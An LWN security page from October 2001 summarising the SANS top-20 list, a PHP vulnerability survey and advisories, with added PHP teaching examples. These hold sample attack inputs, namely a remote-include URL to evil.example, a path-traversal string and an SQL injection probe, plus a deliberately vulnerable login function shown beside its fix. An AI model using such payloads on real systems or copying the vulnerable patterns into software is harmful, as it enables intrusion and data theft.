Security


News and Editorials

The top 20 Internet security vulnerabilities. SANS has posted a list of the 20 most critical security vulnerabilities on the net. The list makes good reading for anybody concerned about the security of their systems, though it is far from a comprehensive list of problems.

The list is broken down into three large sections. The first concerns itself with general, system-independent problems. These include:

  • Default installations of operating systems. A default install typically enables services and installs software that the system does not need; each unneeded component is one more thing to patch and one more way in.

  • Accounts with nonexistent or weak passwords. Some things haven't changed in decades.

  • Bad backups. This, of course, is a general systems administration problem. If a site's backups have not been checked recently for completeness and restorability, there are probably problems.

  • Large numbers of open ports. Many systems run services they do not need.

  • Lack of address filtering on networks. A properly configured network border drops incoming packets that claim a source address from inside the network (ingress filtering) and outgoing packets whose source address is not one of the site's own (egress filtering). The first keeps spoofed traffic out; the second keeps the site from being used as a launch point for spoofed attacks on others.

  • Insufficient logging. Without complete logs, kept where an intruder cannot alter them, detecting an intrusion and working out what it did is guesswork.

  • Vulnerable CGI programs. The net probably has not yet begun to see the degree of mayhem that bad CGI programming can cause.

The middle section lists Windows-specific vulnerabilities; readers interested in those are encouraged to go to the SANS page. The final section goes into Unix-specific problems:

  • Buffer overflows in RPC services.

  • Sendmail vulnerabilities. After a relatively quiet period, sendmail seems to be turning up more problems again - see below.

  • BIND vulnerabilities.

  • The rsh, rlogin, and rcp commands, which send passwords in clear text and which, through .rhosts and hosts.equiv files, let users set up uncontrolled webs of trust between hosts.

  • Vulnerabilities in the lpd subsystem.

  • Sadmind and mountd. The former is Solaris-specific, but every system that serves NFS runs mountd.

  • Default SNMP community strings. The community string is the only "password" SNMP v1 and v2c have, and devices ship with well-known defaults that grant read, and often write, access to their configuration.

A quick look at this list reveals that many of the problems are old, and very few of them are difficult to address. Network security is hard, but, in many cases, even the easy things have not been done.

A survey of PHP vulnerabilities. "Yet Another Hacker Team" has performed an automated audit of a number of PHP-based packages, and has posted the results. The conclusion: much PHP code is vulnerable to remote exploits. Two PHP features are the source of the problems: (1) with register_globals enabled (the default at the time), every parameter in an HTTP request becomes a global variable in the script, so an attacker can initialize any variable the programmer forgot to; and (2) file operations, include() among them, accept a URL in place of a file name. The combination allows a remote attacker to point an include at a file on a server the attacker controls and so run arbitrary PHP code; that code runs with the web server's privileges, which in practice gives the attacker a shell on the server.

The survey makes this claim:

PHP is not insecure by default, but makes insecure programming very easy.

Reasonable people could differ on that point. PHP could be far more secure by simply isolating user-supplied information in a special "request" variable. PHP is great stuff (LWN uses a lot of it), but some aspects of the environment are, indeed, insecure by default.
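The two features above, and one way to code around them, as an added example written for this page; it is not code from the YAHT survey, from LWN, or from any of the audited packages. It assumes a front controller that picks a page to include from a request parameter; the variable $page, the function resolve_page(), the page list and the directory are made up for the illustration, and the request array passed in stands for $HTTP_GET_VARS (PHP 4.0) or $_GET (4.1 and later):

```php
<?php
// Added illustration of the two PHP features the survey blames and of one
// way to code around them. Example code written for this page, not code
// from the survey, from LWN, or from any audited package. The names
// ($page, resolve_page, evil.example, the page list) are made up.

// The pattern that bit many scripts. With register_globals=On, PHP turns
// every request parameter into a global variable, so the request
//   GET /index.php?page=http://evil.example/x
// sets $page before this line runs; and because include() treats a URL
// like a file name, PHP fetches http://evil.example/x.php and executes
// it as the web-server user. Kept commented out so this file is safe to run.
//
//     include($page . '.php');

// Hardened version: read the parameter from the request array only, accept
// just names on an allowlist, and build the path from a fixed directory, so
// neither a URL nor a '../' sequence ever reaches include().
function resolve_page(array $request, $base_dir, array $allowed)
{
    if (!isset($request['page']) || !is_string($request['page'])) {
        return null;                    // missing, or page[]=... (an array)
    }
    $name = $request['page'];
    if (!in_array($name, $allowed, true)) {
        return null;                    // unknown page: refuse, never guess
    }
    return $base_dir . '/' . $name . '.php';
}

$allowed  = array('home', 'about', 'contact');  // constructed page list
$base_dir = '/var/www/site/pages';              // constructed directory

// Constructed requests: one legitimate, three hostile.
$samples = array(
    array('page' => 'about'),
    array('page' => 'http://evil.example/x'),   // remote include attempt
    array('page' => '../../../../etc/passwd'),  // local file disclosure attempt
    array('page' => array('home')),             // page[]=home: not even a string
);
foreach ($samples as $req) {
    $label = is_string($req['page']) ? $req['page'] : 'page[]=home';
    $path  = resolve_page($req, $base_dir, $allowed);
    printf("%-30s -> %s\n", $label, $path === null ? 'rejected' : $path);
}
```

Run it from the command line with php and the three hostile requests come back rejected while the legitimate one resolves to a path under the fixed directory. The allowlist is the important part. Setting register_globals = Off and allow_url_fopen = Off in php.ini removes the two features the survey blames, but a script that includes whatever a parameter names is still a local file inclusion hole, so the configuration change and the code change belong together.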

CRYPTO-GRAM special issue. Bruce Schneier has released a special issue of his CRYPTO-GRAM Newsletter devoted to the events of September 11. "People are willing to give up liberties for vague promises of security because they think they have no choice. What they're not being told is that they can have both. It would require people to say no to the FBI's power grab. It would require us to discard the easy answers in favor of thoughtful answers." Worth a read.

Conectiva cuts off 4.x. Conectiva has served notice that the 4.x versions of its distribution are no longer supported, and no further updates will be available. Conectiva customers running ancient versions of the distribution are encouraged to upgrade to something more recent.

Security Reports

OpenSSH 2.9.9 released. OpenSSH 2.9.9 has been released; it includes a security fix that will be important for people using source-based access control (the from= option on keys in authorized_keys files). Anybody relying on that restriction should upgrade.

A new set of sendmail vulnerabilities. Michal Zalewski has found a new set of vulnerabilities in sendmail; they may be used by a local attacker to obtain unauthorized access to the mail system. Versions of sendmail through 8.12.0 are vulnerable; 8.12.1 has been released and contains fixes for all of the problems. We'll pass on distributor updates as we see them.

Zope DTML scripting security update. There is a new Zope security update out there, fixing a vulnerability in DTML scripting. A suitably clueful user could use the vulnerability to obtain unauthorized access. A fix has been provided by Zope Corp.; expect updates shortly from the distributors that ship Zope as well.

Proprietary products. The following proprietary products were reported to contain vulnerabilities:

  • The Cisco PIX firewall has a vulnerability in its mailguard facility: the restrictions it is supposed to impose on SMTP commands passing through to a protected mail server can be bypassed by an attacker.

Updates

Format string vulnerability in groff. A format string problem exists in groff; since lpd invokes groff to format print jobs, a remote user able to submit jobs to a print server configured that way could apparently exploit it. (First LWN report: August 16, 2001).

The stable release of Debian is not vulnerable.


SQL injection vulnerabilities in Apache authentication modules. Several Apache authentication modules have vulnerabilities that could allow an attacker to feed arbitrary SQL code to the underlying database, resulting in a compromise of database integrity and unauthorized access to the server. See the September 6 security page for more information.

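To see the flaw class in action, here is an added example that recreates it in PHP against an in-memory SQLite database. It is not code from the affected Apache modules (which are written in C) nor from the September 6 page; it needs the pdo_sqlite extension, and the users table, credentials, query shapes and function names are constructed for the illustration:

```php
<?php
// Added example recreating the authentication SQL injection flaw class in
// PHP with an in-memory SQLite database (pdo_sqlite extension required).
// Not code from the Apache modules the advisory covers; the table, the user,
// the query shapes and the function names are all constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT)");
$db->exec("INSERT INTO users VALUES ('alice', 'correct-horse')");

// Vulnerable: the credentials are spliced into the SQL text, which is how an
// authentication module ends up executing whatever the client typed.
function auth_vulnerable(PDO $db, $user, $pass)
{
    $sql = "SELECT name FROM users WHERE name = '$user' AND password = '$pass'";
    return $db->query($sql)->fetchColumn() !== false;
}

// Fixed: the SQL text is constant and the credentials travel as bound
// parameters, so quotes inside them are data, not syntax.
function auth_fixed(PDO $db, $user, $pass)
{
    $st = $db->prepare("SELECT name FROM users WHERE name = ? AND password = ?");
    $st->execute(array($user, $pass));
    return $st->fetchColumn() !== false;
}

// Constructed probes: the real password, a wrong one, and an injection that
// turns the WHERE clause into
//   name = 'alice' AND password = '' OR '1'='1'
// which is true for every row because AND binds tighter than OR.
$probes = array(
    array('alice', 'correct-horse'),
    array('alice', 'wrong'),
    array('alice', "' OR '1'='1"),
);
foreach ($probes as list($u, $p)) {
    printf("%-16s vulnerable=%-5s fixed=%s\n", $p,
        auth_vulnerable($db, $u, $p) ? 'true' : 'false',
        auth_fixed($db, $u, $p) ? 'true' : 'false');
}
```

The vulnerable function accepts the injected "password" and the fixed one rejects it; both accept the real password and reject the wrong one. Escaping quotes before splicing also closes this particular hole, but bound parameters close the whole class, which is why they are the fix to reach for when the query is built from anything a client sent.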

Resources

Linux Security Week from LinuxSecurity.com is available in its October 1 edition. Also available is Linux Advisory Watch for September 28.

CERT has a new PGP key, following the expiration of its previous key at the end of September. See the announcement for the new CERT key information.

Events

The International Cryptography Institute 2001 will be held November 29 and 30 in Washington, DC. Speakers include Dorothy Denning, Whitfield Diffie, Bruce Sterling, and Phil Zimmermann. See the announcement for details.

Upcoming Security Events.

Date                       Event                                                                                  Location
October 10 - 12, 2001      Fourth International Symposium on Recent Advances in Intrusion Detection (RAID 2001)   Davis, CA
November 5 - 8, 2001       8th ACM Conference on Computer and Communications Security (CCS-8)                    Philadelphia, PA, USA
November 13 - 15, 2001     International Conference on Information and Communications Security (ICICS 2001)      Xian, China
November 19 - 22, 2001     Black Hat Briefings                                                                    Amsterdam
November 21 - 23, 2001     International Information Warfare Symposium                                            AAL, Lucerne, Switzerland
November 24 - 30, 2001     Computer Security Mexico                                                               Mexico City
November 29 - 30, 2001     International Cryptography Institute                                                   Washington, DC
December 2 - 7, 2001       LISA 2001, 15th Systems Administration Conference                                      San Diego, CA

For additional security-related events, including training courses (which we don't list above) and events further in the future, check out Security Focus' calendar, one of the primary resources we use for building the above list. To submit an event directly to us, please send a plain-text message to lwn@lwn.net.

Section Editor: Jonathan Corbet


October 4, 2001

Copyright © 2001 Eklektix, Inc., all rights reserved
Linux ® is a registered trademark of Linus Torvalds